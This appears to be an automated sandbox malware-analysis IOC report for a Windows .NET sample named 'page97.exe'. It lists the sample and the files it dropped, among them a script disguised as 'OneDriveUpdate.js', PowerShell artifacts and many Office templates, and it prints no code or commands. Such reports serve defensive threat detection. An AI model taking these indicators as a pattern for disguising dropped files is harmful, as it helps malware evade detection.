Automated Malware Analysis IOC Report for

Files

File Path

Type

Category

Malicious

page97.exe

PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows

initial sample

C:\Users\Public\Libraries\OneDriveUpdate.js

ASCII text, with very long lines (650), with no line terminators

dropped

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\57C8EDB95DF3F0AD4EE2DC2B8CFD4157

Microsoft Cabinet archive data, Windows 2000/XP setup, 4770 bytes, 1 file, at 0x2c +A "disallowedcert.stl", number 1, 1 datablock, 0x1 compression

dropped

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157

data

dropped

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\page97.exe.log

CSV text

dropped

C:\Users\user\AppData\Local\Microsoft\FontCache\4\Catalog\ListAll.Json

JSON data

dropped

C:\Users\user\AppData\Local\Microsoft\FontCache\4\PreviewFont\flat_officeFontsPreview_4_39.ttf

dropped

C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\089d66ba04a8cec4bdc5267f42f39cf84278bb67.tbres

data

dropped

C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\56a61aeb75d8f5be186c26607f4bb213abe7c5ec.tbres

data

dropped

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{D6DE6C31-50E4-4A64-999A-64F2C0205EAA}.tmp

data

dropped

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

data

dropped

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

data

dropped

C:\Users\user\AppData\Local\Temp\Diagnostics\WINWORD\App1714031394081146100_08FD5BC7-410F-4291-8ADB-A33988A3C285.log

ASCII text, with very long lines (1978), with CRLF line terminators

dropped

C:\Users\user\AppData\Local\Temp\Diagnostics\WINWORD\App1714031394081798000_08FD5BC7-410F-4291-8ADB-A33988A3C285.log

data

dropped

C:\Users\user\AppData\Local\Temp\TCD528C.tmp\Content.inf

data

dropped

C:\Users\user\AppData\Local\Temp\TCD528C.tmp\iso690.xsl

XML 1.0 document, ASCII text, with CRLF line terminators

dropped

C:\Users\user\AppData\Local\Temp\TCD528D.tmp\Content.inf

data

dropped

C:\Users\user\AppData\Local\Temp\TCD528D.tmp\mlaseventheditionofficeonline.xsl

XML 1.0 document, ASCII text, with CRLF line terminators

dropped

C:\Users\user\AppData\Local\Temp\TCD52B6.tmp\Content.inf

data

dropped

C:\Users\user\AppData\Local\Temp\TCD52B6.tmp\architecture.glox

Microsoft OOXML

dropped

C:\Users\user\AppData\Local\Temp\TCD52B7.tmp\Content.inf

data

dropped

C:\Users\user\AppData\Local\Temp\TCD52B7.tmp\TabbedArc.glox

Zip archive data, at least v2.0 to extract, compression method=deflate

dropped

C:\Users\user\AppData\Local\Temp\TCD52CC.tmp\Content.inf

data

dropped

C:\Users\user\AppData\Local\Temp\TCD52CC.tmp\HexagonRadial.glox

Microsoft OOXML

dropped

C:\Users\user\AppData\Local\Temp\TCD52DC.tmp\Content.inf

data

dropped

C:\Users\user\AppData\Local\Temp\TCD52DC.tmp\PictureFrame.glox

Microsoft OOXML

dropped

C:\Users\user\AppData\Local\Temp\TCD52F2.tmp\Content.inf

data

dropped

C:\Users\user\AppData\Local\Temp\TCD52F2.tmp\InterconnectedBlockProcess.glox

Zip archive data, at least v2.0 to extract, compression method=deflate

dropped

C:\Users\user\AppData\Local\Temp\TCD52F3.tmp\Content.inf

data

dropped

C:\Users\user\AppData\Local\Temp\TCD52F3.tmp\RadialPictureList.glox

Microsoft OOXML

dropped

C:\Users\user\AppData\Local\Temp\TCD52F4.tmp\Content.inf

data

dropped

C:\Users\user\AppData\Local\Temp\TCD52F4.tmp\gosttitle.xsl

XML 1.0 document, ASCII text, with CRLF line terminators

dropped

C:\Users\user\AppData\Local\Temp\TCD5305.tmp\Content.inf

data

dropped

C:\Users\user\AppData\Local\Temp\TCD5305.tmp\harvardanglia2008officeonline.xsl

XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators

dropped

C:\Users\user\AppData\Local\Temp\TCD5306.tmp\Content.inf

data

dropped

C:\Users\user\AppData\Local\Temp\TCD5306.tmp\pictureorgchart.glox

Microsoft OOXML

dropped

C:\Users\user\AppData\Local\Temp\TCD5316.tmp\Content.inf

data

dropped

C:\Users\user\AppData\Local\Temp\TCD5316.tmp\gb.xsl

XML 1.0 document, ASCII text, with CRLF line terminators

dropped

C:\Users\user\AppData\Local\Temp\TCD531C.tmp\CircleProcess.glox

Zip archive data, at least v2.0 to extract, compression method=deflate

dropped

C:\Users\user\AppData\Local\Temp\TCD531C.tmp\Content.inf

data

dropped

C:\Users\user\AppData\Local\Temp\TCD533E.tmp\Content.inf

data

dropped

C:\Users\user\AppData\Local\Temp\TCD533E.tmp\ieee2006officeonline.xsl

XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators

dropped

C:\Users\user\AppData\Local\Temp\TCD5340.tmp\Content.inf

data

dropped

C:\Users\user\AppData\Local\Temp\TCD5340.tmp\TabList.glox

Zip archive data, at least v2.0 to extract, compression method=deflate

dropped

C:\Users\user\AppData\Local\Temp\TCD5350.tmp\Content.inf

data

dropped

C:\Users\user\AppData\Local\Temp\TCD5350.tmp\chicago.xsl

XML 1.0 document, ASCII text, with CRLF line terminators

dropped

C:\Users\user\AppData\Local\Temp\TCD5351.tmp\Content.inf

data

dropped

C:\Users\user\AppData\Local\Temp\TCD5351.tmp\ConvergingText.glox

Zip archive data, at least v2.0 to extract, compression method=deflate

dropped

C:\Users\user\AppData\Local\Temp\TCD5362.tmp\Content.inf

data

dropped

C:\Users\user\AppData\Local\Temp\TCD5362.tmp\ThemePictureGrid.glox

Zip archive data, at least v2.0 to extract, compression method=deflate

dropped

C:\Users\user\AppData\Local\Temp\TCD5363.tmp\APASixthEditionOfficeOnline.xsl

XML 1.0 document, ASCII text, with CRLF line terminators

dropped

C:\Users\user\AppData\Local\Temp\TCD5363.tmp\Content.inf

data

dropped

C:\Users\user\AppData\Local\Temp\TCD5364.tmp\Content.inf

data

dropped

C:\Users\user\AppData\Local\Temp\TCD5364.tmp\rings.glox

Microsoft OOXML

dropped

C:\Users\user\AppData\Local\Temp\TCD5374.tmp\Content.inf

data

dropped

C:\Users\user\AppData\Local\Temp\TCD5374.tmp\Equations.dotx

Microsoft Word 2007+

dropped

C:\Users\user\AppData\Local\Temp\TCD5385.tmp\Content.inf

data

dropped

C:\Users\user\AppData\Local\Temp\TCD5385.tmp\iso690nmerical.xsl

XML 1.0 document, ASCII text, with CRLF line terminators

dropped

C:\Users\user\AppData\Local\Temp\TCD5396.tmp\Content.inf

data

dropped

C:\Users\user\AppData\Local\Temp\TCD5396.tmp\VaryingWidthList.glox

Microsoft OOXML

dropped

C:\Users\user\AppData\Local\Temp\TCD53C7.tmp\Content.inf

data

dropped

C:\Users\user\AppData\Local\Temp\TCD53C7.tmp\Element design set.dotx

Microsoft Word 2007+

dropped

C:\Users\user\AppData\Local\Temp\TCD53D7.tmp\Content.inf

data

dropped

C:\Users\user\AppData\Local\Temp\TCD53D7.tmp\chevronaccent.glox

Microsoft OOXML

dropped

C:\Users\user\AppData\Local\Temp\TCD5407.tmp\Content.inf

data

dropped

C:\Users\user\AppData\Local\Temp\TCD5407.tmp\gostname.xsl

XML 1.0 document, ASCII text, with CRLF line terminators

dropped

C:\Users\user\AppData\Local\Temp\TCD5418.tmp\Content.inf

data

dropped

C:\Users\user\AppData\Local\Temp\TCD5418.tmp\ThemePictureAccent.glox

Zip archive data, at least v2.0 to extract, compression method=deflate

dropped

C:\Users\user\AppData\Local\Temp\TCD5419.tmp\BracketList.glox

Microsoft OOXML

dropped

C:\Users\user\AppData\Local\Temp\TCD5419.tmp\Content.inf

data

dropped

C:\Users\user\AppData\Local\Temp\TCD541A.tmp\Content.inf

data

dropped

C:\Users\user\AppData\Local\Temp\TCD541A.tmp\ThemePictureAlternatingAccent.glox

Zip archive data, at least v2.0 to extract, compression method=deflate

dropped

C:\Users\user\AppData\Local\Temp\TCD543B.tmp\Content.inf

data

dropped

C:\Users\user\AppData\Local\Temp\TCD543B.tmp\Text Sidebar (Annual Report Red and Black design).docx

Microsoft Word 2007+

dropped

C:\Users\user\AppData\Local\Temp\TCD543C.tmp\Content.inf

data

dropped

C:\Users\user\AppData\Local\Temp\TCD543C.tmp\turabian.xsl

XML 1.0 document, ASCII text, with CRLF line terminators

dropped

C:\Users\user\AppData\Local\Temp\TCD545D.tmp\Content.inf

data

dropped

C:\Users\user\AppData\Local\Temp\TCD545D.tmp\sist02.xsl

XML 1.0 document, ASCII text, with CRLF line terminators

dropped

C:\Users\user\AppData\Local\Temp\TCD547E.tmp\Basis.thmx

Microsoft OOXML

dropped

C:\Users\user\AppData\Local\Temp\TCD547E.tmp\content.inf

Unicode text, UTF-16, little-endian text, with CRLF line terminators

dropped

C:\Users\user\AppData\Local\Temp\TCD54C1.tmp\Frame.thmx

Microsoft OOXML

dropped

C:\Users\user\AppData\Local\Temp\TCD54C1.tmp\content.inf

Unicode text, UTF-16, little-endian text, with CRLF line terminators

dropped

C:\Users\user\AppData\Local\Temp\TCD54C3.tmp\Banded.thmx

Microsoft OOXML

dropped

C:\Users\user\AppData\Local\Temp\TCD54C3.tmp\content.inf

Unicode text, UTF-16, little-endian text, with CRLF line terminators

dropped

C:\Users\user\AppData\Local\Temp\TCD54E3.tmp\View.thmx

Microsoft OOXML

dropped

C:\Users\user\AppData\Local\Temp\TCD54E3.tmp\content.inf

Unicode text, UTF-16, little-endian text, with CRLF line terminators

dropped

C:\Users\user\AppData\Local\Temp\TCD54F4.tmp\Wood_Type.thmx

Microsoft OOXML

dropped

C:\Users\user\AppData\Local\Temp\TCD54F4.tmp\content.inf

Unicode text, UTF-16, little-endian text, with CRLF line terminators

dropped

C:\Users\user\AppData\Local\Temp\TCD5514.tmp\Metropolitan.thmx

Microsoft OOXML

dropped

C:\Users\user\AppData\Local\Temp\TCD5514.tmp\content.inf

Unicode text, UTF-16, little-endian text, with CRLF line terminators

dropped

C:\Users\user\AppData\Local\Temp\TCD5515.tmp\Dividend.thmx

Microsoft OOXML

dropped

C:\Users\user\AppData\Local\Temp\TCD5515.tmp\content.inf

Unicode text, UTF-16, little-endian text, with CRLF line terminators

dropped

C:\Users\user\AppData\Local\Temp\TCD5670.tmp\Parallax.thmx

Zip archive data, at least v2.0 to extract, compression method=deflate

dropped

C:\Users\user\AppData\Local\Temp\TCD5670.tmp\content.inf

Unicode text, UTF-16, little-endian text, with CRLF line terminators

dropped

C:\Users\user\AppData\Local\Temp\TCD5691.tmp\Quotable.thmx

Microsoft OOXML

dropped

C:\Users\user\AppData\Local\Temp\TCD5691.tmp\content.inf

Unicode text, UTF-16, little-endian text, with CRLF line terminators

dropped

C:\Users\user\AppData\Local\Temp\TCD56D1.tmp\Savon.thmx

Microsoft OOXML

dropped

C:\Users\user\AppData\Local\Temp\TCD56D1.tmp\content.inf

Unicode text, UTF-16, little-endian text, with CRLF line terminators

dropped

C:\Users\user\AppData\Local\Temp\TCD5712.tmp\Berlin.thmx

Microsoft OOXML

dropped

C:\Users\user\AppData\Local\Temp\TCD5712.tmp\content.inf

Unicode text, UTF-16, little-endian text, with CRLF line terminators

dropped

C:\Users\user\AppData\Local\Temp\TCD5723.tmp\Parcel.thmx

Microsoft OOXML

dropped

C:\Users\user\AppData\Local\Temp\TCD5723.tmp\content.inf

Unicode text, UTF-16, little-endian text, with CRLF line terminators

dropped

C:\Users\user\AppData\Local\Temp\TCD591B.tmp\Circuit.thmx

Zip archive data, at least v2.0 to extract, compression method=deflate

dropped

C:\Users\user\AppData\Local\Temp\TCD591B.tmp\content.inf

Unicode text, UTF-16, little-endian text, with CRLF line terminators

dropped

C:\Users\user\AppData\Local\Temp\TCD594B.tmp\Gallery.thmx

Microsoft OOXML

dropped

C:\Users\user\AppData\Local\Temp\TCD594B.tmp\content.inf

Unicode text, UTF-16, little-endian text, with CRLF line terminators

dropped

C:\Users\user\AppData\Local\Temp\TCD595B.tmp\Mesh.thmx

Microsoft OOXML

dropped

C:\Users\user\AppData\Local\Temp\TCD595B.tmp\content.inf

Unicode text, UTF-16, little-endian text, with CRLF line terminators

dropped

C:\Users\user\AppData\Local\Temp\TCD5A0D.tmp\Droplet.thmx

Microsoft OOXML

dropped

C:\Users\user\AppData\Local\Temp\TCD5A0D.tmp\content.inf

Unicode text, UTF-16, little-endian text, with CRLF line terminators

dropped

C:\Users\user\AppData\Local\Temp\TCD5A6C.tmp\Main_Event.thmx

Microsoft OOXML

dropped

C:\Users\user\AppData\Local\Temp\TCD5A6C.tmp\content.inf

Unicode text, UTF-16, little-endian text, with CRLF line terminators

dropped

C:\Users\user\AppData\Local\Temp\TCD5A6D.tmp\Slate.thmx

Microsoft OOXML

dropped

C:\Users\user\AppData\Local\Temp\TCD5A6D.tmp\content.inf

Unicode text, UTF-16, little-endian text, with CRLF line terminators

dropped

C:\Users\user\AppData\Local\Temp\TCD5A6E.tmp\Damask.thmx

Microsoft OOXML

modified

C:\Users\user\AppData\Local\Temp\TCD5A6E.tmp\content.inf

Unicode text, UTF-16, little-endian text, with CRLF line terminators

dropped

C:\Users\user\AppData\Local\Temp\TCD5B1C.tmp\Vapor_Trail.thmx

Microsoft OOXML

dropped

C:\Users\user\AppData\Local\Temp\TCD5B1C.tmp\content.inf

Unicode text, UTF-16, little-endian text, with CRLF line terminators

dropped

C:\Users\user\AppData\Local\Temp\TCD5B6B.tmp\Content.inf

data

dropped

C:\Users\user\AppData\Local\Temp\TCD5B6B.tmp\Insight design set.dotx

Microsoft Word 2007+

dropped

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qah3vrgt.hwo.psm1

ASCII text, with no line terminators

dropped

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sbptpe0l.sxe.ps1

ASCII text, with no line terminators

dropped

C:\Users\user\AppData\Local\Temp\cab5267.tmp

Microsoft Cabinet archive data, many, 14864 bytes, 2 files, at 0x4c "mlaseventheditionofficeonline.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 8 datablocks, 0x1203 compression

dropped

C:\Users\user\AppData\Local\Temp\cab5268.tmp

Microsoft Cabinet archive data, many, 4091 bytes, 2 files, at 0x44 "BracketList.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression

dropped

C:\Users\user\AppData\Local\Temp\cab5278.tmp

Microsoft Cabinet archive data, many, 16689 bytes, 2 files, at 0x4c "iso690.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 9 datablocks, 0x1203 compression

dropped

C:\Users\user\AppData\Local\Temp\cab5279.tmp

Microsoft Cabinet archive data, many, 4313 bytes, 2 files, at 0x44 "chevronaccent.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression

dropped

C:\Users\user\AppData\Local\Temp\cab527A.tmp

Microsoft Cabinet archive data, many, 19375 bytes, 2 files, at 0x4c "turabian.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 11 datablocks, 0x1203 compression

dropped

C:\Users\user\AppData\Local\Temp\cab528B.tmp

Microsoft Cabinet archive data, many, 9170 bytes, 2 files, at 0x44 "InterconnectedBlockProcess.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression

dropped

C:\Users\user\AppData\Local\Temp\cab529E.tmp

Microsoft Cabinet archive data, many, 15338 bytes, 2 files, at 0x4c "gosttitle.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 8 datablocks, 0x1203 compression

dropped

C:\Users\user\AppData\Local\Temp\cab529F.tmp

Microsoft Cabinet archive data, many, 15461 bytes, 2 files, at 0x4c "gostname.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 8 datablocks, 0x1203 compression

dropped

C:\Users\user\AppData\Local\Temp\cab52A0.tmp

Microsoft Cabinet archive data, many, 15691 bytes, 2 files, at 0x4c "gb.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 9 datablocks, 0x1203 compression

dropped

C:\Users\user\AppData\Local\Temp\cab52A1.tmp

Microsoft Cabinet archive data, many, 6005 bytes, 2 files, at 0x44 "HexagonRadial.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression

dropped

C:\Users\user\AppData\Local\Temp\cab52A2.tmp

Microsoft Cabinet archive data, many, 5647 bytes, 2 files, at 0x44 "RadialPictureList.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression

dropped

C:\Users\user\AppData\Local\Temp\cab52A3.tmp

Microsoft Cabinet archive data, many, 5864 bytes, 2 files, at 0x44 "architecture.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression

dropped

C:\Users\user\AppData\Local\Temp\cab52A4.tmp

Microsoft Cabinet archive data, many, 15327 bytes, 2 files, at 0x4c "sist02.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 8 datablocks, 0x1203 compression

dropped

C:\Users\user\AppData\Local\Temp\cab52A5.tmp

Microsoft Cabinet archive data, many, 4410 bytes, 2 files, at 0x44 "PictureFrame.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression

dropped

C:\Users\user\AppData\Local\Temp\cab52A6.tmp

Microsoft Cabinet archive data, many, 3749 bytes, 2 files, at 0x44 "TabbedArc.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression

dropped

C:\Users\user\AppData\Local\Temp\cab52B8.tmp

Microsoft Cabinet archive data, many, 15418 bytes, 2 files, at 0x4c "harvardanglia2008officeonline.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 9 datablocks, 0x1203 compression

dropped

C:\Users\user\AppData\Local\Temp\cab52B9.tmp

Microsoft Cabinet archive data, many, 14939 bytes, 2 files, at 0x44 "CircleProcess.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression

dropped

C:\Users\user\AppData\Local\Temp\cab52CA.tmp

Microsoft Cabinet archive data, many, 18672 bytes, 2 files, at 0x4c "APASixthEditionOfficeOnline.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 11 datablocks, 0x1203 compression

dropped

C:\Users\user\AppData\Local\Temp\cab52CB.tmp

Microsoft Cabinet archive data, many, 7453 bytes, 2 files, at 0x44 "pictureorgchart.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression

dropped

C:\Users\user\AppData\Local\Temp\cab52DD.tmp

Microsoft Cabinet archive data, many, 12767 bytes, 2 files, at 0x4c "ieee2006officeonline.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 9 datablocks, 0x1203 compression

dropped

C:\Users\user\AppData\Local\Temp\cab52DE.tmp

Microsoft Cabinet archive data, many, 27509 bytes, 2 files, at 0x4c "Equations.dotx", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 2 datablocks, 0x1203 compression

dropped

C:\Users\user\AppData\Local\Temp\cab52DF.tmp

Microsoft Cabinet archive data, many, 4967 bytes, 2 files, at 0x44 "TabList.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression

dropped

C:\Users\user\AppData\Local\Temp\cab52E0.tmp

Microsoft Cabinet archive data, many, 10800 bytes, 2 files, at 0x44 "ConvergingText.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression

dropped

C:\Users\user\AppData\Local\Temp\cab52E1.tmp

Microsoft Cabinet archive data, many, 14813 bytes, 2 files, at 0x4c "iso690nmerical.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 7 datablocks, 0x1203 compression

dropped

C:\Users\user\AppData\Local\Temp\cab5317.tmp

Microsoft Cabinet archive data, many, 17466 bytes, 2 files, at 0x4c "chicago.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 10 datablocks, 0x1203 compression

dropped

C:\Users\user\AppData\Local\Temp\cab5318.tmp

Microsoft Cabinet archive data, many, 6196 bytes, 2 files, at 0x44 "ThemePictureGrid.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression

dropped

C:\Users\user\AppData\Local\Temp\cab5319.tmp

Microsoft Cabinet archive data, many, 5731 bytes, 2 files, at 0x44 "ThemePictureAlternatingAccent.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression

dropped

C:\Users\user\AppData\Local\Temp\cab531A.tmp

Microsoft Cabinet archive data, many, 6450 bytes, 2 files, at 0x44 "ThemePictureAccent.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression

dropped

C:\Users\user\AppData\Local\Temp\cab531B.tmp

Microsoft Cabinet archive data, many, 5213 bytes, 2 files, at 0x44 "rings.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression

dropped

C:\Users\user\AppData\Local\Temp\cab532D.tmp

Microsoft Cabinet archive data, many, 3144 bytes, 2 files, at 0x44 "VaryingWidthList.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression

dropped

C:\Users\user\AppData\Local\Temp\cab533F.tmp

Microsoft Cabinet archive data, many, 30269 bytes, 2 files, at 0x4c "Text Sidebar (Annual Report Red and Black design).docx", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 2 datablocks, 0x1203 compression

dropped

C:\Users\user\AppData\Local\Temp\cab53B6.tmp

Microsoft Cabinet archive data, many, 26644 bytes, 2 files, at 0x4c "Element design set.dotx", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 2 datablocks, 0x1203 compression

dropped

C:\Users\user\AppData\Local\Temp\cab543A.tmp

Microsoft Cabinet archive data, many, 291188 bytes, 2 files, at 0x44 +A "Banded.thmx" +A "content.inf", flags 0x4, ID 56338, number 1, extra bytes 20 in head, 18 datablocks, 0x1503 compression

dropped

C:\Users\user\AppData\Local\Temp\cab544D.tmp

Microsoft Cabinet archive data, many, 259074 bytes, 2 files, at 0x44 +A "content.inf" +A "Dividend.thmx", flags 0x4, ID 58359, number 1, extra bytes 20 in head, 18 datablocks, 0x1503 compression

dropped

C:\Users\user\AppData\Local\Temp\cab545E.tmp

Microsoft Cabinet archive data, many, 279287 bytes, 2 files, at 0x44 +A "Basis.thmx" +A "content.inf", flags 0x4, ID 55632, number 1, extra bytes 20 in head, 18 datablocks, 0x1503 compression

dropped

C:\Users\user\AppData\Local\Temp\cab548F.tmp

Microsoft Cabinet archive data, many, 252241 bytes, 2 files, at 0x44 +A "content.inf" +A "Frame.thmx", flags 0x4, ID 34169, number 1, extra bytes 20 in head, 16 datablocks, 0x1503 compression

dropped

C:\Users\user\AppData\Local\Temp\cab54A0.tmp

Microsoft Cabinet archive data, many, 206792 bytes, 2 files, at 0x44 +A "content.inf" +A "View.thmx", flags 0x4, ID 33885, number 1, extra bytes 20 in head, 15 datablocks, 0x1503 compression

dropped

C:\Users\user\AppData\Local\Temp\cab54A1.tmp

Microsoft Cabinet archive data, many, 704319 bytes, 2 files, at 0x44 +A "content.inf" +A "Wood_Type.thmx", flags 0x4, ID 5778, number 1, extra bytes 20 in head, 51 datablocks, 0x1503 compression

dropped

C:\Users\user\AppData\Local\Temp\cab54C2.tmp

Microsoft Cabinet archive data, many, 243642 bytes, 2 files, at 0x44 +A "content.inf" +A "Metropolitan.thmx", flags 0x4, ID 19054, number 1, extra bytes 20 in head, 24 datablocks, 0x1503 compression

dropped

C:\Users\user\AppData\Local\Temp\cab563F.tmp

Microsoft Cabinet archive data, many, 533290 bytes, 2 files, at 0x44 +A "content.inf" +A "Parallax.thmx", flags 0x4, ID 64081, number 1, extra bytes 20 in head, 29 datablocks, 0x1503 compression

dropped

C:\Users\user\AppData\Local\Temp\cab5650.tmp

Microsoft Cabinet archive data, many, 624532 bytes, 2 files, at 0x44 +A "content.inf" +A "Quotable.thmx", flags 0x4, ID 13510, number 1, extra bytes 20 in head, 30 datablocks, 0x1503 compression

dropped

C:\Users\user\AppData\Local\Temp\cab5680.tmp

Microsoft Cabinet archive data, many, 1049713 bytes, 2 files, at 0x44 +A "content.inf" +A "Savon.thmx", flags 0x4, ID 60609, number 1, extra bytes 20 in head, 37 datablocks, 0x1503 compression

dropped

C:\Users\user\AppData\Local\Temp\cab56D2.tmp

Microsoft Cabinet archive data, many, 682092 bytes, 2 files, at 0x44 +A "Berlin.thmx" +A "content.inf", flags 0x4, ID 46672, number 1, extra bytes 20 in head, 30 datablocks, 0x1503 compression

dropped

C:\Users\user\AppData\Local\Temp\cab56D3.tmp

Microsoft Cabinet archive data, many, 214772 bytes, 2 files, at 0x44 +A "content.inf" +A "Parcel.thmx", flags 0x4, ID 26500, number 1, extra bytes 20 in head, 19 datablocks, 0x1503 compression

dropped

C:\Users\user\AppData\Local\Temp\cab58D9.tmp

Microsoft Cabinet archive data, many, 1081343 bytes, 2 files, at 0x44 +A "Circuit.thmx" +A "content.inf", flags 0x4, ID 11309, number 1, extra bytes 20 in head, 45 datablocks, 0x1503 compression

dropped

C:\Users\user\AppData\Local\Temp\cab58EA.tmp

Microsoft Cabinet archive data, many, 2573508 bytes, 2 files, at 0x44 +A "content.inf" +A "Mesh.thmx", flags 0x4, ID 62129, number 1, extra bytes 20 in head, 94 datablocks, 0x1503 compression

dropped

C:\Users\user\AppData\Local\Temp\cab58EB.tmp

Microsoft Cabinet archive data, many, 937309 bytes, 2 files, at 0x44 +A "content.inf" +A "Gallery.thmx", flags 0x4, ID 44349, number 1, extra bytes 20 in head, 34 datablocks, 0x1503 compression

dropped

C:\Users\user\AppData\Local\Temp\cab59BA.tmp

Microsoft Cabinet archive data, many, 1291243 bytes, 2 files, at 0x44 +A "content.inf" +A "Droplet.thmx", flags 0x4, ID 47417, number 1, extra bytes 20 in head, 54 datablocks, 0x1503 compression

dropped

C:\Users\user\AppData\Local\Temp\cab59BB.tmp

Microsoft Cabinet archive data, many, 1750009 bytes, 2 files, at 0x44 +A "content.inf" +A "Slate.thmx", flags 0x4, ID 28969, number 1, extra bytes 20 in head, 72 datablocks, 0x1503 compression

dropped

C:\Users\user\AppData\Local\Temp\cab59CC.tmp

Microsoft Cabinet archive data, many, 3239239 bytes, 2 files, at 0x44 +A "content.inf" +A "Vapor_Trail.thmx", flags 0x4, ID 19811, number 1, extra bytes 20 in head, 111 datablocks, 0x1503 compression

dropped

C:\Users\user\AppData\Local\Temp\cab59CD.tmp

Microsoft Cabinet archive data, many, 1865728 bytes, 2 files, at 0x44 +A "content.inf" +A "Damask.thmx", flags 0x4, ID 63852, number 1, extra bytes 20 in head, 68 datablocks, 0x1503 compression

dropped

C:\Users\user\AppData\Local\Temp\cab59CE.tmp

Microsoft Cabinet archive data, many, 2511552 bytes, 2 files, at 0x44 +A "content.inf" +A "Main_Event.thmx", flags 0x4, ID 59889, number 1, extra bytes 20 in head, 90 datablocks, 0x1503 compression

dropped

C:\Users\user\AppData\Local\Temp\cab5A6F.tmp

Microsoft Cabinet archive data, many, 3400898 bytes, 2 files, at 0x4c "Insight design set.dotx", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 106 datablocks, 0x1203 compression

dropped

C:\Users\user\AppData\Roaming\Microsoft\Office\MSO3072.acl

data

dropped

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\dolphin.LNK

MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Thu Apr 25 06:49:52 2024, mtime=Thu Apr 25 06:49:55 2024, atime=Thu Apr 25 06:49:52 2024, length=12264, window=hide

dropped

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat

Generic INItialization configuration [folders]

dropped

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03090430[[fn=Banded]].thmx (copy)

Microsoft OOXML

dropped

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03090434[[fn=Wood Type]].thmx (copy)

Microsoft OOXML

dropped

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457444[[fn=Basis]].thmx (copy)

Microsoft OOXML

dropped

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457464[[fn=Dividend]].thmx (copy)

Microsoft OOXML

dropped

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457475[[fn=Frame]].thmx (copy)

Microsoft OOXML

dropped

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457485[[fn=Mesh]].thmx (copy)

Microsoft OOXML

dropped

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457491[[fn=Metropolitan]].thmx (copy)

Microsoft OOXML

dropped

